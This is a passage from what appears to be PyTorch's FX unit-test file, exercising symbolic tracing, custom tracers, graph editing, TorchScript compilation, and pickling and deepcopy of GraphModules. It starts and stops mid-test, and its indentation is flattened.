mod = symbolic_trace(rmatmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), rmatmul_f(inp))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
# saving the original list because we will insert new nodes as a part of a test
orig_graph_nodes = list(graph.nodes)
for node in orig_graph_nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
# verify that copying the node does not lose the stack trace
new_node = graph.node_copy(node)
self.assertTrue(new_node.stack_trace is not None)
assert 'test_fx.py' in new_node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the speficied return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_close(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_close(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_close(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_trace_buffer_slice(self):
bs, d_hid = 10, 23
class ExampleCode(torch.nn.Module):
def __init__(self):
super().__init__()
self.mm_param = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.mm_param2 = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.lin = torch.nn.Linear(d_hid, d_hid)
self.register_buffer('buffer', torch.randn(bs + 100, d_hid))
def forward(self, x):
x = torch.mm(x, self.mm_param)
skip_connection = x
x = torch.relu(x)
x = torch.mm(x, self.mm_param) + self.buffer[:x.shape[0]]
x = self.lin(x)
x = torch.relu(x)
x = x + skip_connection
x = torch.mm(x, self.mm_param2)
x = self.lin(x)
return x
ec = ExampleCode()
traced = torch.fx.symbolic_trace(ec)
x = torch.randn(bs, d_hid)
torch.testing.assert_allclose(ec(x), traced(x))
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_tensor_attribute_coalseced(self):
def count_attrs(fx_module):
targets = set()
for node in traced.graph.nodes:
if node.op == 'get_attr':
targets.add(node.target)
return len(targets)
val = torch.tensor(5)
def f(x):
return x + val + val
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 1)
val2 = torch.tensor(5)
def f(x):
val = torch.tensor(5)
return x + val + val2
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 2)
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError as argument can't be `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_torch_fx_getattr(self):
class FXGetattrTest(torch.nn.Module):
def forward(self, x):
return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3]))
traced = symbolic_trace(FXGetattrTest())
self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3]))
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_remove_uses_with_custom_filter(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu, lambda x: x != neg)
self.assertTrue(neg in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
